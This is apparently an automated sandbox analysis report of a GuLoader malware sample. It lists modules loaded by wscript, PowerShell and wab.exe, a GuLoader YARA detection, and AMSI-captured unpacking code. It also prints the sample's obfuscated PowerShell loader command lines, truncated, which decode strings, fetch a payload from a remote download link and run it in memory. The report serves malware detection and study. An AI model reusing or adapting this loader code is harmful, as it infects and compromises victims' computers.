Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: comsvcs.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: cmlua.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: cmutil.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: cryptdlg.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: msoert2.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: cryptui.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: msftedit.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: actxprxy.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: iertutil.dll	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: C:\Program Files (x86)\Windows Mail\wab.exe

File opened: C:\Windows\SysWOW64\msftedit.dll

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Data Obfuscation

VBScript performs obfuscated calls to suspicious functions

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: .Run("POWERSHELL "$Hjkommisrs='Rakkerens';$Troublesome=${host}.Runspace;If ($Troublesome) {$Telephoning++;$Hjkommisrs+=", "0")

Yara detected GuLoader

Source: Yara match	File source: 0000000C.00000002.1634165473.000000000C6E5000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.1633262835.0000000009630000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1808446859.000001BCD84EF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.1616454793.0000000005946000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String($Transalpiner)$global:Hjniveausprogene = [System.Text.Encoding]::ASCII.GetString($Industrialiseres)$global:Sulfittet=$Hjniveausprogene.substring($Strikketj,$Firmabilerne54)<#Autokrate
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Noninfectiously $Manifoldness $Skipton), (Chivw @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Coadjustment = [AppDomain]::CurrentDomain.GetAssemblies()$g
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Byfornyelsens115)), $Gestaltpsykolog).DefineDynamicModule($Tipssensationerne, $false).DefineType($Elektrotekniskes, $Zarrigerne, [Syst
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String($Transalpiner)$global:Hjniveausprogene = [System.Text.Encoding]::ASCII.GetString($Industrialiseres)$global:Sulfittet=$Hjniveausprogene.substring($Strikketj,$Firmabilerne54)<#Autokrate

Obfuscated command line found

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Hjkommisrs='Rakkerens';$Troublesome=${host}.Runspace;If ($Troublesome) {$Telephoning++;$Hjkommisrs+='Cacodorous';$Achyrodes='su';$Hjkommisrs+='Coruscate';$Achyrodes+='bs';$Hjkommisrs+='Tungusian';$Achyrodes+='tri';$Hjkommisrs+='Sonatinen';$Achyrodes+='ng';};Function Hammondorglets($Stavnen){$Vouchering=$Stavnen.Length-$Telephoning;For( $Svirrefluerne=5;$Svirrefluerne -lt $Vouchering;$Svirrefluerne+=6){$Ulceromembranous+=$Stavnen.$Achyrodes.'Invoke'( $Svirrefluerne, $Telephoning);}$Ulceromembranous;}function Markedsadgang($Diabolizing){ . ($Udglatter174) ($Diabolizing);}$Footslogging=Hammondorglets 'Di,boMI,trooKalorztausci ordtlHormelProseaB,gge/Feltr5 tim..Tegne0 Dm.n Baggr(GutwiWTmre iIul,snschrod He toEt.niwOb.igsCensu MedbyN InocTRdvin Derin1dorde0Tuber.Ersta0 Ch,f;P.arm NondiWHarstiUnsiznSpeed6Thorv4Tamil;M,gal Deco,xGeebu6heide4Misfo; Subs purtrProfivCrypt:Stork1 Evan2 Trep1Tilba.Fort 0Bogde)Piast BugtaGV skoe Skatc HandkMartyoSkavg/ Zai 2.lvia0Jazzh1Hukom0Ekspo0 B ni1Hasar0 Prie1Cacoe oldnFBis.aiKo sirSkareeFjolrf Uds oF,ugtxregio/ Doub1Cupre2 Okku1calip.indbj0Ve de ';$Uncoveredly=Hammondorglets 'DanneU manusRygerePuff.r ,lag-.riguA Sc pg T,umeTaramnProditMos k ';$Raasylte=Hammondorglets 'PsychhJomont G.smtImmovpChests Medd:Rub.i/Antia/ Obstd StjerSlanki Amylvf rmseAbbed..amesgWis,aoPorphoDk,drgSukatl Per eBorge. BrancFrekvoP.nkum Gimp/Progru UdvacKe sk?PetiteC irpxA elspAudi,ofa,igr Su gt gmnd=bochedGr peoDelsaw FejlnAdvanl XerooAntema.nseddBevge& nonliTabordFlubd= iorh1O chf2F.ndeyTs.tsWJustehEmbryD elytklserePForte2 StueA C,nf-And,rDIrr,t0Reinv-,lmmeP BeloYMist Y CallqC,clo5FladtcHvinty YatafVe,ruhInf.ueCirkuo C.gn3Li,deEO,lfopDeut,S.olmuePr.je_Ph.ll9K.ukaKSankt ';$Ceratitidae=Hammondorglets 'B vog> Stag ';$Udglatter174=Hammondorglets 'cedryiChaloeMididx Rat, ';$Unshrinkingly='Ubiquities';$Superfluity = Hammondorglets 'KneeleDor.oc D,odhLand,o Vat. Opti%Rigwia BaadpDok,op.hrondDrupea tetrtPennya forj% Agna\Hjt aDDi,kke,nsigpCo rarIbrugaCantovTnd.aeOverosAmi r.Unc mTM,ndeeMisk,r svin Togvo& Pseu&Setba LnposeIonizcForedhTus.aoPol s MacrtAksem ';Markedsadgang (Hammondorglets 'Salts$ ForlgBeslalComidoTwee.bAfr,kaForurlMealy: In.assa,rou DorsbFiksatVix,nr A.vroIvi.dpSkumliVal.ts mmorkWyteseLamesskafka=Snide(Gldelc,ennemUnderdNdlgn Ta,t/Sa,myc Bug. Erys$UdspiSUnrepuAphrapConc.e Chamr Hebrftressl Bilyu IndkiH.mentBlgety ndri)Fundi ');Markedsadgang (Hammondorglets ' P.gt$ Re rgbudgelU vikoRenprb Co,uaMavedlM nil:.altecNyskal MdeaoHloftc BetokUdforwObfusiBru ssFemkaeAtlan=Ude.u$PsaltRRoastaGenskaSebi,sKysery St,alLitretGapcheKo,em.ReagesTyponp.rotol udraifatt.t ewil(fyrst$f,ldeC .ndee ngenrUndera,mmettGymnaitero,tM,aneiWrongd Shera oreteBrtte)Galop ');Markedsadgang (Hammondorglets 'Tilbe[ SchlNWeigheAc uitVeget.mun.cSst,leeDeta.rC,llbvBaga,iIm,osc Fonde SacrPCosm,oIntimiKritinHorn tForesMVagt aIncubnClinoa
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Hjkommisrs='Rakkerens';$Troublesome=${host}.Runspace;If ($Troublesome) {$Telephoning++;$Hjkommisrs+='Cacodorous';$Achyrodes='su';$Hjkommisrs+='Coruscate';$Achyrodes+='bs';$Hjkommisrs+='Tungusian';$Achyrodes+='tri';$Hjkommisrs+='Sonatinen';$Achyrodes+='ng';};Function Hammondorglets($Stavnen){$Vouchering=$Stavnen.Length-$Telephoning;For( $Svirrefluerne=5;$Svirrefluerne -lt $Vouchering;$Svirrefluerne+=6){$Ulceromembranous+=$Stavnen.$Achyrodes.'Invoke'( $Svirrefluerne, $Telephoning);}$Ulceromembranous;}function Markedsadgang($Diabolizing){ . ($Udglatter174) ($Diabolizing);}$Footslogging=Hammondorglets 'Di,boMI,trooKalorztausci ordtlHormelProseaB,gge/Feltr5 tim..Tegne0 Dm.n Baggr(GutwiWTmre iIul,snschrod He toEt.niwOb.igsCensu MedbyN InocTRdvin Derin1dorde0Tuber.Ersta0 Ch,f;P.arm NondiWHarstiUnsiznSpeed6Thorv4Tamil;M,gal Deco,xGeebu6heide4Misfo; Subs purtrProfivCrypt:Stork1 Evan2 Trep1Tilba.Fort 0Bogde)Piast BugtaGV skoe Skatc HandkMartyoSkavg/ Zai 2.lvia0Jazzh1Hukom0Ekspo0 B ni1Hasar0 Prie1Cacoe oldnFBis.aiKo sirSkareeFjolrf Uds oF,ugtxregio/ Doub1Cupre2 Okku1calip.indbj0Ve de ';$Uncoveredly=Hammondorglets 'DanneU manusRygerePuff.r ,lag-.riguA Sc pg T,umeTaramnProditMos k ';$Raasylte=Hammondorglets 'PsychhJomont G.smtImmovpChests Medd:Rub.i/Antia/ Obstd StjerSlanki Amylvf rmseAbbed..amesgWis,aoPorphoDk,drgSukatl Per eBorge. BrancFrekvoP.nkum Gimp/Progru UdvacKe sk?PetiteC irpxA elspAudi,ofa,igr Su gt gmnd=bochedGr peoDelsaw FejlnAdvanl XerooAntema.nseddBevge& nonliTabordFlubd= iorh1O chf2F.ndeyTs.tsWJustehEmbryD elytklserePForte2 StueA C,nf-And,rDIrr,t0Reinv-,lmmeP BeloYMist Y CallqC,clo5FladtcHvinty YatafVe,ruhInf.ueCirkuo C.gn3Li,deEO,lfopDeut,S.olmuePr.je_Ph.ll9K.ukaKSankt ';$Ceratitidae=Hammondorglets 'B vog> Stag ';$Udglatter174=Hammondorglets 'cedryiChaloeMididx Rat, ';$Unshrinkingly='Ubiquities';$Superfluity = Hammondorglets 'KneeleDor.oc D,odhLand,o Vat. Opti%Rigwia BaadpDok,op.hrondDrupea tetrtPennya forj% Agna\Hjt aDDi,kke,nsigpCo rarIbrugaCantovTnd.aeOverosAmi r.Unc mTM,ndeeMisk,r svin Togvo& Pseu&Setba LnposeIonizcForedhTus.aoPol s MacrtAksem ';Markedsadgang (Hammondorglets 'Salts$ ForlgBeslalComidoTwee.bAfr,kaForurlMealy: In.assa,rou DorsbFiksatVix,nr A.vroIvi.dpSkumliVal.ts mmorkWyteseLamesskafka=Snide(Gldelc,ennemUnderdNdlgn Ta,t/Sa,myc Bug. Erys$UdspiSUnrepuAphrapConc.e Chamr Hebrftressl Bilyu IndkiH.mentBlgety ndri)Fundi ');Markedsadgang (Hammondorglets ' P.gt$ Re rgbudgelU vikoRenprb Co,uaMavedlM nil:.altecNyskal MdeaoHloftc BetokUdforwObfusiBru ssFemkaeAtlan=Ude.u$PsaltRRoastaGenskaSebi,sKysery St,alLitretGapcheKo,em.ReagesTyponp.rotol udraifatt.t ewil(fyrst$f,ldeC .ndee ngenrUndera,mmettGymnaitero,tM,aneiWrongd Shera oreteBrtte)Galop ');Markedsadgang (Hammondorglets 'Tilbe[ SchlNWeigheAc uitVeget.mun.cSst,leeDeta.rC,llbvBaga,iIm,osc Fonde SacrPCosm,oIntimiKritinHorn tForesMVagt aIncubnClinoa
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Hjkommisrs='Rakkerens';$Troublesome=${host}.Runspace;If ($Troublesome) {$Telephoning++;$Hjkommisrs+='Cacodorous';$Achyrodes='su';$Hjkommisrs+='Coruscate';$Achyrodes+='bs';$Hjkommisrs+='Tungusian';$Achyrodes+='tri';$Hjkommisrs+='Sonatinen';$Achyrodes+='ng';};Function Hammondorglets($Stavnen){$Vouchering=$Stavnen.Length-$Telephoning;For( $Svirrefluerne=5;$Svirrefluerne -lt $Vouchering;$Svirrefluerne+=6){$Ulceromembranous+=$Stavnen.$Achyrodes.'Invoke'( $Svirrefluerne, $Telephoning);}$Ulceromembranous;}function Markedsadgang($Diabolizing){ . ($Udglatter174) ($Diabolizing);}$Footslogging=Hammondorglets 'Di,boMI,trooKalorztausci ordtlHormelProseaB,gge/Feltr5 tim..Tegne0 Dm.n Baggr(GutwiWTmre iIul,snschrod He toEt.niwOb.igsCensu MedbyN InocTRdvin Derin1dorde0Tuber.Ersta0 Ch,f;P.arm NondiWHarstiUnsiznSpeed6Thorv4Tamil;M,gal Deco,xGeebu6heide4Misfo; Subs purtrProfivCrypt:Stork1 Evan2 Trep1Tilba.Fort 0Bogde)Piast BugtaGV skoe Skatc HandkMartyoSkavg/ Zai 2.lvia0Jazzh1Hukom0Ekspo0 B ni1Hasar0 Prie1Cacoe oldnFBis.aiKo sirSkareeFjolrf Uds oF,ugtxregio/ Doub1Cupre2 Okku1calip.indbj0Ve de ';$Uncoveredly=Hammondorglets 'DanneU manusRygerePuff.r ,lag-.riguA Sc pg T,umeTaramnProditMos k ';$Raasylte=Hammondorglets 'PsychhJomont G.smtImmovpChests Medd:Rub.i/Antia/ Obstd StjerSlanki Amylvf rmseAbbed..amesgWis,aoPorphoDk,drgSukatl Per eBorge. 